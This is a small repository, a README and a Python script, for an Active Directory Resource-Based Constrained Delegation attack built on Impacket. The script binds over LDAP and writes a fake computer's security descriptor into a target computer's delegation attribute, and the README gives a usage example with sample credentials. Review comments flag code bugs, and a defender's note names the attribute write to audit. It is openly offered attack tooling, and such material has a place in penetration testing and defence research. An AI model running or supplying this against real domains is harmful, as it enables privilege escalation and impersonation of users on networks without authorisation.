├── README.md
└── rbcd.py

/README.md:
--------------------------------------------------------------------------------
# RBCD

A Python script that performs a Resource-Based Constrained Delegation (RBCD) attack using the Impacket toolkit.

## Usage

```
usage: rbcd.py [-h] -u USERNAME -p PASSWORD -t COMPUTERNAME -f COMPUTERNAME HOSTNAME

Resource-Based Constrained Delegation Attack: allow an attacker controllable (preferably previously created fake) computer for delegation on a target computer (where the attacker has write
access to properties through LDAP)

Required options:
  HOSTNAME              Hostname/ip or ldap://host:port connection string to connect to the AD

Main options:
  -h, --help            show this help message and exit
  -u USERNAME, --user USERNAME
                        DOMAIN\username for authentication
  -p PASSWORD, --password PASSWORD
                        Password or LM:NTLM hash, will prompt if not specified
  -t COMPUTERNAME       Target computer hostname where the attacker has write access to properties
  -f COMPUTERNAME       (Fake) computer hostname which the attacker can control

Example: ./rbcd.py -host 10.10.10.1 -u domain\\user -p P@ssw0rd@123 -t WEB -f FAKECOMP
```

## Blog

[Abusing Resource-Based Constrained Delegation (RBCD) using Linux](https://www.alteredsecurity.com/post/resource-based-constrained-delegation-rbcd)

## Credit

This is a modified version of the [rbcd-attack](https://github.com/tothi/rbcd-attack) script, originally developed by [an0n](https://twitter.com/an0n_r0).
"""rbcd.py -- Impacket-based Resource-Based Constrained Delegation (RBCD) helper.

What this script does, in order (all of it is visible in this file):
  1. parses the LDAP host, credentials, a target computer name (-t) and an
     attacker-controlled "fake" computer name (-f);
  2. binds to the directory over LDAP with NTLM using ldap3;
  3. builds an Impacket NTLMRelayxConfig and an ldapdomaindump dumper;
  4. hands off to impacket's LDAPAttack.delegateAttack(), which -- per the
     final log message below -- writes a security descriptor naming the
     fake computer into msDS-AllowedToActOnBehalfOfOtherIdentity on the
     target computer object.  delegateAttack itself is opaque from here;
     confirm its exact behaviour against the Impacket version in use.

Defender's note: the directory change this script is built to make is the
attribute write named in that last log message, on the target computer
object, performed over a connection bound as the supplied user.  Auditing
modifications of that attribute on computer objects is the matching
detection point, and the write is attributable to the binding account.
"""
import sys
import argparse
import ldap3
import ldapdomaindump
from impacket import version
from impacket import logging
from impacket.examples import logger
from impacket.examples.ntlmrelayx.attacks.ldapattack import LDAPAttack
from impacket.examples.ntlmrelayx.utils.config import NTLMRelayxConfig

print(version.BANNER)

# Argument parsing.  NOTE(review): _optionals / _positionals are private
# argparse attributes; retitling the help sections this way is not a
# public API and may break across Python versions.
parser = argparse.ArgumentParser(add_help=True, description='Resource-Based Constrained Delegation Attack: allow an attacker controllable (preferably previously created fake) computer for delegation on a target computer (where the attacker has write access to properties through LDAP)')
parser._optionals.title = "Main options"
parser._positionals.title = "Required options"

#Main parameters
# NOTE(review): `maingroup` is created but never used -- every argument
# below is added to `parser` directly, so the group has no effect.
maingroup = parser.add_argument_group("Main options")
# Positional: a bare host/IP or an ldap://host:port connection string.
parser.add_argument("host", metavar='HOSTNAME', help="Hostname/ip or ldap://host:port connection string to connect to the AD")
# DOMAIN\username form; rewritten to DOMAIN/username before LDAPAttack (see below).
parser.add_argument("-u", "--user", required=True, metavar='USERNAME', help="DOMAIN\\username for authentication")
# NOTE(review): the help text says "will prompt if not specified", but the
# option is required=True, so no prompt path exists -- the secret is always
# taken from the command line, where it is visible in process listings and
# shell history.
parser.add_argument("-p", "--password", required=True, metavar='PASSWORD', help="Password or LM:NTLM hash, will prompt if not specified")
parser.add_argument('-t', required=True, action='store', metavar='COMPUTERNAME', help='Target computer hostname where the attacker has write access to properties')
parser.add_argument('-f', required=True, action='store', metavar='COMPUTERNAME', help='(Fake) computer hostname which the attacker can control')

# With no arguments at all, print help plus an example and exit non-zero.
# NOTE(review): the example passes `-host`, but `host` is declared above
# as a positional argument, so the example does not match the parser.
if len(sys.argv) == 1:
    parser.print_help()
    print('\nExample: ./rbcd.py -host 10.10.10.1 -u domain\\\\user -p P@ssw0rd@123 -t WEB -f FAKECOMP')
    sys.exit(1)

options = parser.parse_args()

# Impacket's relay config is reused here as a plain settings object: the
# fake computer name goes in addcomputer and the LDAP host in target.
# Which of these fields LDAPAttack actually reads is defined in impacket,
# not in this file.
c = NTLMRelayxConfig()
c.addcomputer = options.f
c.target = options.host

logger.init()
logging.getLogger().setLevel(logging.INFO)
logging.info('Starting Resource Based Constrained Delegation Attack against {}$'.format(options.t))

logging.info('Initializing LDAP connection to {}'.format(options.host))
# No TLS object is configured (tls=False below).  The commented-out line is
# a leftover TLS configuration with certificate validation disabled; note
# that `ssl` is not imported in this file, so re-enabling it unchanged
# would raise NameError.
#tls = ldap3.Tls(validate=ssl.CERT_NONE, version=ssl.PROTOCOL_TLSv1_2)
serv = ldap3.Server(options.host, tls=False, get_info=ldap3.ALL)
logging.info('Using {} account with password ***'.format(options.user))
conn = ldap3.Connection(serv, user=options.user, password=options.password, authentication=ldap3.NTLM)
# NOTE(review): the result of bind() is discarded, so "LDAP bind OK" is
# logged even when authentication failed; a failed bind only surfaces
# later, when a call that depends on the connection errors out.
conn.bind()
logging.info('LDAP bind OK')

logging.info('Initializing domainDumper()')
cnf = ldapdomaindump.domainDumpConfig()
# Output directory comes from the relay config's lootdir (its default value
# is defined in impacket, not here).
cnf.basepath = c.lootdir
dd = ldapdomaindump.domainDumper(serv, conn, cnf)

logging.info('Initializing LDAPAttack()')
# The already-bound connection is passed straight in.  The username is
# rewritten from DOMAIN\user (the form -u documents) to DOMAIN/user --
# presumably the form LDAPAttack expects; confirm against impacket.
la = LDAPAttack(c, conn, options.user.replace('\\', '/'))

logging.info('Writing SECURITY_DESCRIPTOR related to (fake) computer `{}` into msDS-AllowedToActOnBehalfOfOtherIdentity of target computer `{}`'.format(options.f, options.t))
# A trailing '$' is appended to both computer names, matching the `{}$`
# form used in the first log message (machine-account naming).  sid=None,
# so any SID lookup happens inside delegateAttack and is not visible here.
la.delegateAttack(options.f+'$', options.t+'$', dd, sid=None)